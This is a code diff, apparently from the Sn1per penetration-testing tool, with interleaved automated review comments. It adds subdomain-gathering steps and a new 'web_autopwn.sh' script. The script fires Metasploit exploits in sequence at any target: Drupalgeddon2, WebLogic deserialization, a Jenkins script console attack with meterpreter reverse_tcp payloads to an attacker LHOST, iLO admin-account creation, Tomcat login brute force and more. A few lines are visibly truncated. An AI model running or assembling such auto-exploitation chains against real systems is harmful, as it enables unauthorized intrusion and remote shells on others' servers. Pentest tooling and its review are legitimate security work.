"${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/unix/webapp/drupal_drupalgeddon2; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-drupal_drupalgeddon2.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-drupal_drupalgeddon2.raw > $LOOT_DIR/output/msf-$TARGET-port443-drupal_drupalgeddon2.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-drupal_drupalgeddon2.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING ORACLE WEBLOGIC SERVER DESERIALIZATION RCE CVE-2018-2628 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/misc/weblogic_deserialize; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-weblogic_deserialize.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-weblogic_deserialize.raw > $LOOT_DIR/output/msf-$TARGET-port443-weblogic_deserialize.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-weblogic_deserialize.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING OSCOMMERCE INSTALLER RCE CVE-2018-2628 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/oscommerce_installer_unauth_code_exec; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; 
exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-oscommerce_installer_unauth_code_exec.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-oscommerce_installer_unauth_code_exec.raw > $LOOT_DIR/output/msf-$TARGET-port443-oscommerce_installer_unauth_code_exec.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-oscommerce_installer_unauth_code_exec.raw 2> /dev/null + PORT="443" + SSL="true" + source modes/web_autopwn.sh fi fi \ No newline at end of file diff --git a/modes/recon.sh b/modes/recon.sh index e0e421af..991ac8b5 100644 --- a/modes/recon.sh +++ b/modes/recon.sh 
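Review bot: The `SSL="true"` set here is undone for the first three modules of the file it hands off to: at the top of the new modes/web_autopwn.sh, `setg SSL "$SSL"` is immediately followed by `setg SSL false` for http_put, webdav_scanner and iis_webdav_scstoragepathfromurl, so on this 443 path those run in clear text and the value assigned in this hunk never takes effect there; dropping the trailing `setg SSL false` in web_autopwn.sh makes the passed value authoritative. Separately, `source modes/web_autopwn.sh` is a relative path that only resolves because of the unchecked `cd $INSTALL_DIR` a few lines above; `source "$INSTALL_DIR/modes/web_autopwn.sh"` removes the dependency on the working directory. The same relative `source` appears in the normal_webporthttp.sh hunk above this one.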
@@ -40,10 +40,39 @@ if [ "$RECON" = "1" ]; then
 echo ""
 echo -e "${OKRED}[+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-full.txt"
 fi
+
+
+
+
+
+
+
+ if [ "$CENSYS_SUBDOMAINS" = "1" ]; then
+ echo -e "${OKGREEN}====================================================================================${RESET}"
+ echo -e "$OKRED GATHERING CENSYS SUBDOMAINS $RESET"
+ echo -e "${OKGREEN}====================================================================================${RESET}"
+ python $PLUGINS_DIR/censys-subdomain-finder/censys_subdomain_finder.py --censys-api-id $CENSYS_APP_ID --censys-api-secret $CENSYS_API_SECRET $TARGET | egrep "\-" | awk '{print $2}' | tee $LOOT_DIR/domains/domains-$TARGET-censys.txt 2> /dev/null
+ fi
+
+
+
+
+
+
+
+
+ if [ "$PROJECT_SONAR" = "1" ]; then
+ echo -e "${OKGREEN}====================================================================================${RESET}"
+ echo -e "$OKRED GATHERING PROJECT SONAR SUBDOMAINS $RESET"
+ echo -e "${OKGREEN}====================================================================================${RESET}"
+ curl -fsSL "https://dns.bufferover.run/dns?q=.$TARGET" | sed 's/\"//g' | cut -f2 -d "," |sort -u | grep $TARGET | tee $LOOT_DIR/domains/domains-$TARGET-projectsonar.txt 2> /dev/null
+ fi
 cat $LOOT_DIR/domains/domains-$TARGET-crt.txt 2> /dev/null > /tmp/curl.out 2> /dev/null
 cat $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null >> /tmp/curl.out 2> /dev/null
 cat $LOOT_DIR/domains/domains-$TARGET-amass-sorted.txt 2> /dev/null >> /tmp/curl.out 2> /dev/null
 cat $LOOT_DIR/domains/domains-$TARGET-subfinder.txt 2> /dev/null >> /tmp/curl.out 2> /dev/null
+ cat $LOOT_DIR/domains/domains-$TARGET-projectsonar.txt 2> /dev/null >> /tmp/curl.out 2> /dev/null
+ cat $LOOT_DIR/domains/domains-$TARGET-censys.txt 2> /dev/null >> /tmp/curl.out 2> /dev/null
 cat $LOOT_DIR/domains/targets.txt 2> /dev/null >> /tmp/curl.out 2> /dev/null
 sort -u /tmp/curl.out 2> /dev/null > $LOOT_DIR/domains/domains-$TARGET-full.txt
 rm -f
/tmp/curl.out 2> /dev/null diff --git a/modes/stealth.sh b/modes/stealth.sh index 7f0f8629..dce6e7b8 100644 --- a/modes/stealth.sh +++ b/modes/stealth.sh @@ -85,6 +85,7 @@ if [ "$MODE" = "stealth" ]; then fi dig all +short $TARGET > $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null dig all +short -x $TARGET >> $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null + dig A $TARGET 2> /dev/null >> $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null dnsenum $TARGET 2> /dev/null | tee $LOOT_DIR/output/dnsenum-$TARGET.txt 2> /dev/null mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null @@ -153,6 +154,12 @@ if [ "$MODE" = "stealth" ]; then wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET.txt 2> /dev/null curl --connect-timeout 5 --max-time 5 -I -s -R http://$TARGET | tee $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null curl --connect-timeout 5 -s -R -L http://$TARGET > $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null + if [ "$WEBTECH" = "1" ]; then + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + webtech -u http://$TARGET | grep \- | cut -d- -f2- | tee $LOOT_DIR/web/webtech-$TARGET-http.txt + fi echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" 
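Review bot: The censys invocation passes `$CENSYS_API_SECRET` as a command-line argument, so the API secret is readable by every local user in the process list for the duration of the run and ends up in shell traces and history when this mode is invoked by hand. The upstream censys-subdomain-finder documents reading its credentials from the environment instead, so scoping them to that one command (`CENSYS_API_ID="$CENSYS_APP_ID" CENSYS_API_SECRET="$CENSYS_API_SECRET" python $PLUGINS_DIR/censys-subdomain-finder/censys_subdomain_finder.py $TARGET`) keeps them out of argv — confirm the variable names against the plugin's README before switching. While there, the config key read here is `CENSYS_APP_ID` but the flag is `--censys-api-id`; worth checking that sniper.conf (not in this view) defines `CENSYS_APP_ID` and not `CENSYS_API_ID`. In the Project Sonar line, `grep $TARGET` uses the unquoted domain as a regex, so each dot matches any character; `grep -F -- "$TARGET"` filters on the literal name.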
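Review bot: `dig A $TARGET` without `+short` appends dig's full answer — the `;` header comments, QUESTION and ANSWER sections, query time and server lines — to ips-all-unsorted.txt, so the `sort -u` into ips-all-sorted.txt added at the end of this file collects those lines as though they were addresses. The two dig calls directly above already use `+short`; `dig A +short $TARGET 2> /dev/null >> $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null` matches them and yields one value per line. Note that `+short` still prints any intermediate CNAME target before the A record, so a dotted-quad filter may be wanted wherever that file is consumed as an IP list.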
@@ -160,7 +167,9 @@ if [ "$MODE" = "stealth" ]; then
 echo -e "${OKGREEN}====================================================================================${RESET}"
 echo -e "$OKRED DISPLAYING COMMENTS $RESET"
 echo -e "${OKGREEN}====================================================================================${RESET}"
- cat $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null | grep "<\!\-\-" 2> /dev/null | tee $LOOT_DIR/web/webcomments-http-$TARGET.txt 2> /dev/null
+ cat $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null | grep "<\!\-\-" 2> /dev/null | tee $LOOT_DIR/web/webcomments-http-$TARGET 2> /dev/null
+ sed -r "s/ /dev/null > $LOOT_DIR/web/webcomments-http-$TARGET.txt 2> /dev/null
+ rm -f $LOOT_DIR/web/webcomments-http-$TARGET 2> /dev/null
 echo -e "${OKGREEN}====================================================================================${RESET}"
 echo -e "$OKRED DISPLAYING SITE LINKS $RESET"
 echo -e "${OKGREEN}====================================================================================${RESET}"
@@ -188,9 +197,9 @@ if [ "$MODE" = "stealth" ]; then
 echo -e "$OKRED RUNNING ACTIVE WEB SPIDER $RESET"
 echo -e "${OKGREEN}====================================================================================${RESET}"
 if [ "$VERBOSE" == "1" ]; then
- echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN blackwidow -u http://$TARGET:80 -l 3 $RESET"
+ echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN blackwidow -u http://$TARGET:80 -l 2 $RESET"
 fi
- blackwidow -u http://$TARGET:80 -l 3 -v n
+ blackwidow -u http://$TARGET:80 -l 2 -v n
 cat /usr/share/blackwidow/$TARGET*/* > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
 cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
 cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
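Review bot: The new `sed -r "s/ /dev/null > $LOOT_DIR/web/webcomments-http-$TARGET.txt 2> /dev/null` line is not a complete command as shown here: the substitution has no pattern or replacement, the closing quote and the input file (`$LOOT_DIR/web/webcomments-http-$TARGET`) are missing, so as written sed would block on stdin and the .txt is never populated while the intermediate file is still removed on the next line. The `grep "<\!\-\-"` feeding it suggests the intent is to strip the HTML comment delimiters, and the rendering may have swallowed exactly that text; please confirm the committed file carries the full expression with the intermediate file as its input. The identical line appears in the https hunk further down (`webcomments-https-$TARGET`).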
@@ -256,6 +265,12 @@ if [ "$MODE" = "stealth" ]; then
 wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET.txt 2> /dev/null
 curl --connect-timeout 5 --max-time 5 -I -s -R https://$TARGET | tee $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null
 curl --connect-timeout 5 -s -R -L https://$TARGET > $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null
+ if [ "$WEBTECH" = "1" ]; then
+ echo -e "${OKGREEN}====================================================================================${RESET}"
+ echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET"
+ echo -e "${OKGREEN}====================================================================================${RESET}"
+ webtech -u https://$TARGET | grep \- | cut -d- -f2- | tee $LOOT_DIR/web/webtech-$TARGET-https.txt
+ fi
 echo -e "${OKGREEN}====================================================================================${RESET}"
 echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET"
 echo -e "${OKGREEN}====================================================================================${RESET}"
@@ -263,7 +278,9 @@ if [ "$MODE" = "stealth" ]; then
 echo -e "${OKGREEN}====================================================================================${RESET}"
 echo -e "$OKRED DISPLAYING COMMENTS $RESET"
 echo -e "${OKGREEN}====================================================================================${RESET}"
- cat $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null | grep "<\!\-\-" 2> /dev/null | tee $LOOT_DIR/web/webcomments-https-$TARGET.txt 2> /dev/null
+ cat $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null | grep "<\!\-\-" 2> /dev/null | tee $LOOT_DIR/web/webcomments-https-$TARGET 2> /dev/null
+ sed -r "s/ /dev/null > $LOOT_DIR/web/webcomments-https-$TARGET.txt 2> /dev/null
+ rm -f $LOOT_DIR/web/webcomments-https-$TARGET 2> /dev/null
 echo -e "${OKGREEN}====================================================================================${RESET}"
 echo -e "$OKRED DISPLAYING SITE LINKS $RESET"
 echo -e "${OKGREEN}====================================================================================${RESET}"
@@ -285,7 +302,7 @@ if [ "$MODE" = "stealth" ]; then
 if [ "$VERBOSE" == "1" ]; then
 echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN blackwidow -u https://$TARGET:443 -l 3$RESET"
 fi
- blackwidow -u https://$TARGET:443 -l 3 -v n
+ blackwidow -u https://$TARGET:443 -l 2 -v n
 cat /usr/share/blackwidow/$TARGET*/* >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
 fi
 if [ $WEB_BRUTE_STEALTHSCAN == "1" ]; then
@@ -347,6 +364,7 @@ if [ "$MODE" = "stealth" ]; then
 echo -e ""
 echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
 rm -f $INSTALL_DIR/.fuse_* 2> /dev/null
+ sort -u $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null > $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null
 if [ "$LOOT" = "1" ]; then
 loot
 fi
diff --git a/modes/web_autopwn.sh b/modes/web_autopwn.sh
new file mode 100644
index 00000000..7464adae
--- /dev/null
+++ b/modes/web_autopwn.sh
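Review bot: In the `-285,7 +302,7` hunk the verbose banner still reports `blackwidow -u https://$TARGET:443 -l 3` while the command below it now runs with `-l 2`, so the echoed command no longer reflects what executes; the http counterpart earlier in this file updated both lines together. Change the context line to `echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN blackwidow -u https://$TARGET:443 -l 2$RESET"` so the trace matches.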
@@ -0,0 +1,174 @@ + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg SSL false; run; set PATH /uploads/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg SSL false; run; use scanner/http/webdav_website_content; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg 
RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg SSL false; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING MANAGEENGINE DESKTOP CENTRAL RCE EXPLOIT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/windows/http/manageengine_connectionid_write; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING APACHE TOMCAT ENUMERATION $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use scanner/http/tomcat_enum; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.raw + sed -r 
"s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING APACHE TOMCAT MANAGER LOGIN BRUTEFORCE $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use auxiliary/scanner/http/tomcat_mgr_login; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING JENKINS ENUMERATION $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use scanner/http/jenkins_enum; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; set TARGETURI /; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING JENKINS SCRIPT CONSOLE RCE EXPLOIT $RESET" + echo -e 
"${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use multi/http/jenkins_script_console; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; setg SSL "$SSL"; set TARGET 0; run; set TARGETURI /; run; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set TARGET 1; run; set PAYLOAD linux/x86/meterpreter/reverse_tcp; run; set TARGET 2; set PAYLOAD linux/x64/meterpreter/reverse_tcp; run; set PAYLOAD linux/x86/meterpreter/reverse_tcp; run; set TARGETURI /; run; set TARGET 1; run; set TARGET 2; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET" + echo -e 
"${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING ELASTICSEARCH DYNAMIC SCRIPT JAVA INJECTION EXPLOIT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/multi/elasticsearch/script_mvel_rce; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee 
$LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING DRUPALGEDDON HTTP PARAMETER SQL INJECTION CVE-2014-3704 $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/multi/http/drupal_drupageddon; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; setg URI /drupal/; setg TARGETURI /drupal/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING GLASSFISH ADMIN TRAVERSAL EXPLOIT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use scanner/http/glassfish_traversal; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.txt 2> /dev/null + rm -f 
$LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOITS $RESET" + echo -e 
